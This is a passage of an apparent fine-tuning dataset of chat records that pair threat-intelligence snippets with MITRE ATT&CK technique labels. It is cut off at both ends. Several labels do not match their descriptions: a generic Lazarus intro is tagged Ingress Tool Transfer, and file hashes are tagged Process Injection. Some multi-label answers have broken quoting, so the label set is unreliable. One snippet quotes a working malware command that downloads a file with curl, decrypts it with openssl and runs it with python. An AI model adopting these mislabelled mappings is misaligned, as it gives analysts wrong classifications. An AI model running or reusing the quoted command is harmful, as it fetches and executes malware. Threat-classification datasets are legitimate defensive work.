Component Blending Blends with .mui files Blend with ActiveX data Object dll files Table1: Similarities of the Loader components in both incidents Analysis of backdoors used in 2018 The Lazarus group used a series of backdoors in their 2018 attacks, employing a complicated technique that involves three major components: AuditCred.dll/ROptimizer.dll (detected by Trend Micro as BKDR_BINLODR.ZNFJ-A) – loader DLL that is launched as a service Msadoz.dll (detected by Trend Micro as BKDR64_BINLODR.ZNFJ-A) – encrypted backdoor n = number of characters in the loader dll’s filename Auditcred.dll.mui/rOptimizer.dll.mui (detected by Trend Micro as TROJ_BINLODRCONF.ZNFJ-A) – encrypted configuration file Figure 1: Loading sequence of the modularized backdoor The loader DLL is installed as a service and uses different names (AuditCred and ROptimizer) on different machines" }, { "role": "assistant", "content": "T1055 - Process Injection', 'T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking', 'T1218.011 - Signed Binary Proxy Execution: Rundll32', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT41 sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PLEAD has the ability to steal saved passwords from Microsoft Outlook." }, { "role": "assistant", "content": "T1555 - Credentials from Password Stores" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Flagpro v2.0 has another new function. If a dialog title is “Internet Explorer [7-11]” (the number after “Internet Explorer” depends on what version the user users) when Flagpro accesses to an external site, Flagpro sends WM_CLOSE message to close the dialog" }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Winnti for Windows HTTP/S C2 mode can make use of an external proxy." }, { "role": "assistant", "content": "T1090.002 - External Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KOCTOPUS will attempt to delete or disable all Registry keys and scheduled tasks related to Microsoft Security Defender and Security Essentials." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Vasport is capable of tunneling though a proxy." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This is an interesting technique used by Lazarus to run its malicious DLL using the Windows Update Client to bypass security detection mechanisms" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After initial compromise, will download a second stage to establish a more permanent presence on the affected system." }, { "role": "assistant", "content": "T1104 - Multi-Stage Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CARROTBALL has the ability to use FTP in C2 communications." }, { "role": "assistant", "content": "T1071.002 - File Transfer Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can execute ipconfig on the victim’s machine." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Blue Mockingbird has collected hardware details for the victim's system, including CPU and memory information." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Industroyer sends information about hardware profiles and previously-received commands back to the C2 server in a POST-request." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "hides from defenders by hooking libc function calls, hiding artifacts that would reveal its presence, such as the user account it creates to provide access and undermining strace, a tool often used to identify malware." }, { "role": "assistant", "content": "T1014 - Rootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For example, they stated DROPSHOT uses more advanced anti-emulation techniques, utilizes external scripts for self-deletion, and uses memory injection versus external drivers for deployment" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses SSL/TLS and RC4 to encrypt traffic." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "menuPass has used DLL side-loading to launch versions of Mimikatz and PwDump6 as well as UPPERCUT." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zebrocy gets the username from the system." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has used a brute-force/password-spray tooling that operated in two modes: in password-spraying mode it conducted approximately four authentication attempts per hour per targeted account over the course of several days or weeks. APT28 has also used a Kubernetes cluster to conduct distributed, large-scale password spray attacks." }, { "role": "assistant", "content": "T1110.003 - Brute Force: Password Spraying" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group is one of the most sophisticated North Korean APTs that has been active since 2009. The group is responsible for many high profile attacks in the past and has gained worldwide attention. The Malwarebytes Threat Intelligence team is actively monitoring its activities and was able to spot a new campaign on Jan 18th 2022" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can use \"sudo\" to run a command." }, { "role": "assistant", "content": "T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zebrocy identifies network drives when they are added to victim systems." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "hides many of its backdoor payloads in an alternate data stream (ADS)." }, { "role": "assistant", "content": "T1564.004 - Hide Artifacts: NTFS File Attributes" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A variant of executes dir C:\\progra~1 when initially run." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In an uninhibited Emotet infection, it’s likely the malware would have then attempted to move laterally to other machines in the environment. Malwarebytes has some good analyses of Emotet if you’re looking for further reading" }, { "role": "assistant", "content": "T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used the Plink utility to create SSH tunnels." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OwaAuth web shell command set" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "2e0361fd73f60c76c69806205307ccac, update.dll (MiniDuke), 425kb (internal name = “UserCache.dll“) 9e3f3b5e9ece79102d257e8cf982e09e, cache.dll (CozyDuke), 425kb (internal name = “UserCache.dll“) The two share identical export function names in their export directories, and the naming appears to be randomly assigned at compile time" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We also observed a third approach used by a malicious document file to deliver Hancitor. Although the threat actor and command and control servers are similar to the second Hancitor delivery approach, this one uses an alternate tactic to reach its goal of data theft" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Avaddon has decrypted encrypted strings." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "versions are signed with various valid certificates; one was likely faked and issued by Comodo for \"Solid Loop Ltd,\" and another was issued for \"Ultimate Computer Support Ltd.\"" }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BOATLAUNCH is a utility sent from FIN7 POWERPLANT controllers that is used as a helper module during intrusion operations. BOATLAUNCH is used to patch PowerShell processes on infected systems to bypass Windows AntiMalware Scan Interface (AMSI). The malware loops, looking for unpatched PowerShell processes, and for each unpatched process the malware locates and patches amsi.dll!AmsiScanBuffer with a 5-byte instruction sequence to always return S_OK. The technique used to patch AMSI is a variation of publicly described common AMSI bypass techniques. Both 32bit and 64bit variants of BOATLAUNCH have been observed using the following export directory DLL names." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has renamed malware to legitimate names such as \"ESTCommon.dll\" or \"patch.dll\"." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has used tools to identify if a mouse is connected to a targeted system." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Techniques for Analysis When I was analyzing this sample, the malware was unable to connect to its C2.  However, I was still able to analyze the network traffic of the sample.  How, you might ask?  Using a hex editor and a script I wrote to encrypt text using the algorithm that this sample uses, I encrypted my own C2 address (192.168.1.108:7721) and replaced the hardcoded C2 address with my own encrypted address.  I then opened a listener on my own IP on the respective port.    [Screenshot 3] comparison of My IP (Left) vs C2 IP (Right) Next, using a debugger, I set a couple breakpoints in the Internet Communications function and ran the malware.  The malware sample then connected to my IP and sent information to me, which I was able to observe using Wireshark.  After I’d captured the traffic, I was able to write another script to decrypt and decompress the traffic in order to view the data being sent.  Additionally, I then wrote a socket script that detects the Gh0stRAT variant traffic, automatically decrypts the traffic, and then extracts the Implant_Opcodes for the sample.  A second version of the script allows commands to be sent back to the malware, after I enumerated the exact command format for the sample.  [Screenshot 4] Output of Version 1 of the script So far, the 2 opcodes that the sample has sent are 0x65 and 0x66, or Implant_Heartbeat and Implant_Login, respectively.  “Hitting between the heartbeats” When sending commands, first the sample must login in with 0x65, then you can send commands to it.  However, you have to move fast as the sample will send an Implant_Heartbeat followed by an Implant_Login every 10 seconds or so, and if you try to send a command to the sample as it is responding with either opcode, it will ignore the command.  A proof of concept of the command script can be found here , while the Implant extraction script and the Command Script will be included in the Appendix" }, { "role": "assistant", "content": "T1573 - Encrypted Channel', 'T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNBURST collected the username from a compromised host." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ecipekac has used a valid, legitimate digital signature to evade detection." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware can use 2 different public RSA keys: one exported using the crypto api in a public blob or using the embedded in base64 in the malware. The malware will only use the second one if it cannot create the crypto context or has some problem with the crypto api functions" }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "surveys a system upon check-in to discover operating system configuration details using the systeminfo and set commands." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The password-protected ZIP attachments contain a Microsoft Word document with macros to install malware. See Appendix A for examples of these Word documents from June 2020. Prior to April 2020, the most common malware caused by Word documents associated with Shathak/TA551 was Ursnif. Since April 2020, the most common malware distributed by these Word documents has been Valak. Appendix C lists a series of Valak DLL examples from June 2020" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After the victim clicks the Enable Content button, the macro commands are executed and invoke the Windows OS process msiexec.exe. This process is the Windows Installer, a software component and application programming interface of Microsoft Windows used for the installation, maintenance, and removal of software" }, { "role": "assistant", "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It then calls the API EnumWindows() function to enumerate all windows from the victim’s system. Its EnumFunc() callback function collects all windows titles and then adds a 14H long random string prefix. One mixed windows title looks like this: “{14H long random string}+windows title”. All the mixed windows titles are added into a string list box control" }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Explosive has commonly set file and path attributes to hidden." }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can collect system information including the OS version and domain on a compromised host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The app executes the following shell command to download a custom-compiled version of the EggShell server for macOS: nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py The first part of the command downloads an encoded file from a Github page belonging to a user named youarenick\" and saves that file to a hidden file named .info.enc in /private/tmp/. Next, it uses openssl to decode that file into a hidden Python file named .info.py. Finally, it executes the resulting Python script.\"" }, { "role": "assistant", "content": "T1553.001 - Subvert Trust Controls: Gatekeeper Bypass" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crutch has used a hardcoded GitHub repository as a fallback channel." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malicious macros were all designed to use Windows PowerShell to download a shellcode-based payload from a remote server" }, { "role": "assistant", "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Exaramel for Linux has a hardcoded location under systemd that it uses to achieve persistence if it is running as root." }, { "role": "assistant", "content": "T1543.002 - Create or Modify System Process: SysV/Systemd Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has harvested user's login credentials." }, { "role": "assistant", "content": "T1589.001 - Credentials" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "New services created by are made to appear like legitimate Windows services, with names such as \"Windows Management Help Service\", \"Microsoft Support\", and \"Windows Advanced Task Manager\"." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Overall the code is very well written and designed to execute quickly to encrypt the defined files in the configuration of the ransomware. The embedded configuration file has some interesting options which we will highlight further in this article" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT37 has used an audio capturing utility known as SOUNDWAVE that captures microphone input." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The TAINTEDSCRIBE command and execution module can perform target system enumeration." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WellMess can execute command line scripts received from C2." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware can decode contents from a payload that was Base64 encoded and write the contents to a file." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uploads data in 2048-byte chunks." }, { "role": "assistant", "content": "T1030 - Data Transfer Size Limits" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Babuk can stop specific services related to backups." }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HotCroissant has the ability to upload a file from the command and control (C2) server to the victim machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Archive files that contain a legitimate executable and a malicious DLL, to be used in a DLL hijacking technique, taking advantage of legitimate executables such as Outlook and Avast proxy, to load a malicious DLL" }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca has acquired multiple servers for some of their operations, using each server for a different role." }, { "role": "assistant", "content": "T1583.004 - Server" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cuba can enumerate local drives, disk type, and disk free space." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Whitefly has the ability to download additional tools from the C2." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet collects the IP address of a compromised system." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The archive contains a legitimate older version of Microsoft Word (Microsoft Word 2007) executable file that is named ‘Noi dung chi tiet don khieu nai gui cong ty.exe’ which translates to ‘Learn more about how to use your company’ in English. The attacker used the DLL side loading technique to load a malicious DLL by the older version of Microsoft Word. When opening the executable file in the archive, it loads the malicious DLL in the same directory. The DLL executes multi-stage shellcodes and each shellcode employs various technique to hide the next stage" }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HTTPBrowser has used DLL side-loading." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hikit has used HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has removed system logs from \"/var/log/syslog\"." }, { "role": "assistant", "content": "T1070.002 - Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Trojan.Karagany can steal data and credentials from browsers." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Denis performed process hollowing through the API calls CreateRemoteThread, ResumeThread, and Wow64SetThreadContext." }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Backdoor.Oldrea adds Registry Run keys to achieve persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SamSam has been seen deleting its own files and payloads to make analysis of the attack more difficult." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has compressed files before exfiltration using TAR and RAR." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Throughout the intrusion, the injected Cobalt Strike Processes utilized various named pipes for inter-process communications. Many of these pipes used default Cobalt Strike pipe patterns." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to obtain file and directory listings." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This DLL is used to create a scheduled task that points to the QuasarRAT binary, microsoft_network.exe, allowing it to remain persistent after reboot" }, { "role": "assistant", "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This module searches the infected system’s files to gather email addresses for information-stealing purposes." }, { "role": "assistant", "content": "T1114 - Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Industroyer decrypts code to connect to a remote C2 server." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KGH_SPY can decrypt encrypted strings and write them to a newly created folder." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HenBox attempts to hide itself from the app launcher view by running the following code, passing the parameters COMPONENT_ENABLED_STATE_DISABLED (2) and DONT_KILL_APP (1) to the setComponentEnabledSetting() method." }, { "role": "assistant", "content": "T1564 - Hide Artifacts" } ] }, { "messages": [ { "role": "system", 